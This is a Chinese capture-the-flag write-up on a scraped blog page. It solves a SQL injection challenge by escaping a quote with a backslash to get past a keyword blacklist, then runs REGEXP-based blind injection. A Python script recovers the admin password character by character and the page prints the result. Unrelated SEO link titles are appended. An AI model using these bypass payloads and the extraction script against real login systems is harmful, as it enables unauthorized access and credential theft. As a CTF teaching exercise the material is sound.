当前位置: 首页 > news >正文

网站建设渠道seo网站推广价格

网站建设渠道,seo网站推广价格,网站开发使用的语言类,无货源网店进货app欸嘿,继续sql注入。又是新的sql注入类型 很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。里边提示hint.txt $black_list "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00…

欸嘿,继续sql注入。又是新的sql注入类型

 很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。里边提示hint.txt

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";If $_POST['passwd'] === admin's password,Then you will get the flag;

 过滤了一些东西,而且只要密码对了就能拿到flag。来看看fuzz结果吧 。

 

过滤有点多哦,而且我还没放完。单引号被过滤了,一刀砍在大动脉。但是路堵了,不代表窗户也封了。我突然想到反斜杠将引号转义,在将后边的引号注释掉不就绕过了吗?思路的确是这个思路,不过常规盲注与常规注入关键字被过滤差不多,看了大佬wp,说重点在regexp上。

payload大概就是这个样子

username=\&passwd=||(True);%00

 查询语句变成了以下形式。其中一个单引号被 \ 影响,成了普通字符,导致单引号闭合错误

select * from users where username='\' and passwd='||(True);%00'

 ;%00代替注释符

 ()代替空格。%09 /**/也是可以的代替空格的

返回正确会有一个welcome.php。接下来就是脚本运行正则盲注了

||(passwd)regexp("^Yo");%00 

含义:匹配当前表下,passwd列里的内容是否为YO或者yo。

说真的这种写法第一次见还是有点突兀。因为是正则匹配,所以在脚本中,一定要过滤掉通配符("*","+","?")。不然脚本就会一直卡在通配符。而且这个passwd列名,是猜的。估计是hint.txt里有个passwd。。。。

import requests
from urllib import parseflag=''
url='http://019f0128-771d-48bb-8dab-8b6e9995ca8d.node5.buuoj.cn:81/index.php'
for i in range(1,500,1):for y in range(1,128,1):x=flag+chr(y)data='||passwd/**/regexp/**/"^{}";{}'.format(parse.unquote(x),parse.unquote('%00'))  #%00也要解码#print(chr(y))content = {'username': '\\',                   #防转义'passwd': data}#print(data)datas=requests.post(url=url,data=content)if chr(y)=='*' or chr(y)=='+' or chr(y)=='?':   #因为是正则匹配,所以要过滤通配符continueelif "welcome" in datas.text:flag=flag+chr(y)print(flag)break

 自己写的脚本有点烂,见谅。

 

因为大小写不区分,所以这里还得转小写。

print('YOU_WILL_NEVER_KNOW7788990'.lower())
#you_will_never_know7788990

登录就能拿到flag了 。

 

http://www.yayakq.cn/news/489799/

相关文章:

  • 网站行业代理注册公司注意什么
  • 专业建站网站用齐博cms建网站
  • 网站建设文件名东莞厚街核酸检测点
  • 河南重大项目建设网站网站宣传软文
  • 怎么查网站的关键词排名seo查询徽号{lotlek}出本词效果
  • 做服装微商城网站如何将微信和企业网站同步
  • 网站制作工具 简易asp古典网站源码
  • 甘肃建设局网站网站服务器租用高防就不怕攻击吗
  • 吉林企业网站模板建站哪个好免费教如何php网站建设
  • cpa怎么做网站深圳企业网站建设方案
  • 义乌网站建设公司代理宁波市建设银行网站
  • 做外贸网站哪家效果好北京定制网站开发
  • 网站关键词排行查询python网站开发高并发
  • 网站的目标定位有哪些wordpress本地无法打开
  • 网站建设 落地页网络营销考试题及答案
  • 数码家电商城网站源码厦门短视频代运营公司
  • 那种网站2021高仿卡地亚手表网站
  • 漯河网站建设服务公司怎么加快网站打开速度
  • 深圳企业网站建设报价东莞市路桥所
  • 定制产品网站有哪些大型网站 空间
  • 网站是做百度快照推广好英文写作网站
  • 哪里可以做微网站杭州微信建站
  • wordpress get_results百度搜索结果优化
  • 网站的维护与更新吗网络服务提供者是谁
  • 搜狗站长平台主动提交成都系统软件定制开发
  • 一般的网站开发语言用什么网站建设丶金手指下拉14
  • 你知道的2021网站关键词排名优化应该怎么做
  • 做刷单网站犯法吗学校网站规划方案
  • 网站建设答辩ppt下载网站建设jz518
  • 公司网站搜索引擎优化门户类网站的主页设计